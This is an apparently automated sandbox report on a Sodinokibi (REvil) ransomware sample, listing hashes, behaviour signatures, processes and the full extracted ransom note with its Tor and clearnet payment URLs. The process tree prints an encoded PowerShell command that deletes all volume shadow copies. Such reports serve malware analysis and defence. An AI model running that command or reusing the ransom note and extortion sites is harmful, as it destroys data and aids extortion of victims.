Analysis

  • max time kernel
    166s
  • max time network
    178s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    24-01-2022 00:53

General

  • Target

    dbfe1b859321098ba278b692ed6c0685ffcdd2e1c7c4f7289f0db09a5db6dc6c.exe

  • Size

    164KB

  • MD5

    e15f1d0621564f7cd294b252c11d91c1

  • SHA1

    cb78aa749f30ba640418e77e72ca9cedd1220ddf

  • SHA256

    dbfe1b859321098ba278b692ed6c0685ffcdd2e1c7c4f7289f0db09a5db6dc6c

  • SHA512

    d64d4e4db816d1a77e2f6938f1285f043e14143a338224132117105d105faadb4295d2aad8e56e776ee2981259ba20196226ad730eb0f10da87c74500ecea39a

Malware Config

Extracted

Path

C:\ejce897-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension ejce897. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/C5D04ABE7BDD1785 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/C5D04ABE7BDD1785 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: NKUmW6isobNJv1ORn9jOTMu6nF9wcTYLFauztE7BUMjA0J8/1UbzxEzQ+vJ9Rl8V sXYmbZSillWqE9JWFTMgt5uV9wz6Ihxi68abSFpeBOv33NgZnCKt1qwgI/XXtg6I H/MJ67DyJYgaioN2xbUYakXrjatJiyK2GKdYfclbspO1w6dykebqUkMeu4I1JpfG qbgGKsA6NoGU5921XJdkr6rRtdl+PultfrvqyArNFnUxq0kHL2helGkPse8uQFVe xoagve/mD3YozdT1waKJeuBEOOUtaqL/+ZOsCo3ZJi2Mm5N8iWVji/Ebi//DZyP/ kHJNRUx3oYgN3kxcKB4wEeiDJM78xQ1gajFitr10Wi2BMakQDapRWJ0ldyQkHYeU ZRqAc8sTMzRCOND/T+AGE4enBKc8GSUE3S+3NK55X0WwJiIp1dwLRsfxTUJY3xWX rhAnFKThrwdMbJLR1T2NRyOfLncxndFVQUVdtSzv7DHoHc34RiosZ5IqPpEibXDj aTfhTc0Bv1GbRD68H/E8Ln0U0wJt+JRVUNclV6QjMFu6oROAyrfLgA9+K+g2Xxrl Bu8poohSAsuqDwBojbztV0ULvlk8vsm880l/Q6Uzv0BKo50WIy1++kGJH/O8iSBm +PahLRpAAcgXp5qnA3vFJdtra2h3l2G+X4kj1bBbBUXlE1hYJw4OToq0rYjNlVMy 1T+sqmLzmzKRNiWgeEknAK4DsDXhUqE5SecD7gAUj08l/DQ5a6CArusvOuhvdW/0 Lt+mkeeGWeE5j724rUAeaBj0kMUMGPFDYvgAqg6Pwrcjmykwf8bNUUccvezUexFG yvLCxdmwrlRBRTgCnvsMcAMLbIkzB667JyIe8N0zLSvWhmGfBv+jtvltfLlWElGJ OU4PEbZ540AJbkF6vhVsY2VPdHqeqOqEOXauiUEuw5e2oAAbwKq5FqcMmF0kZWTL q8NIHdH7MCYYUQDU5sx7/wY64CatMt/lJcoC7z6Ld2F14DDAaoeF30bRje0ShifV h79anm4YOcH2Zm8T0m2u3eTx4a31HVAQ3ewX1nRvCF2+qGg3Ycc+UXp5Q9SF0WQV TTp9kk1cd6M8k9t47gTdIm+F3HKhanfBinnZa/n3hp4SutOwVoSScQnsHKoRVw== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/C5D04ABE7BDD1785

http://decryptor.top/C5D04ABE7BDD1785

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 3 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\dbfe1b859321098ba278b692ed6c0685ffcdd2e1c7c4f7289f0db09a5db6dc6c.exe
    "C:\Users\Admin\AppData\Local\Temp\dbfe1b859321098ba278b692ed6c0685ffcdd2e1c7c4f7289f0db09a5db6dc6c.exe"
    1⤵
    • Modifies extensions of user files
    • Adds Run key to start application
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2764
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1304
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:3704
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3672

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1304-121-0x000001C9AE230000-0x000001C9AE252000-memory.dmp
      Filesize

      136KB

    • memory/1304-124-0x000001C9C6DE0000-0x000001C9C6E56000-memory.dmp
      Filesize

      472KB

    • memory/1304-136-0x000001C9AE2A0000-0x000001C9C63D0000-memory.dmp
      Filesize

      385.2MB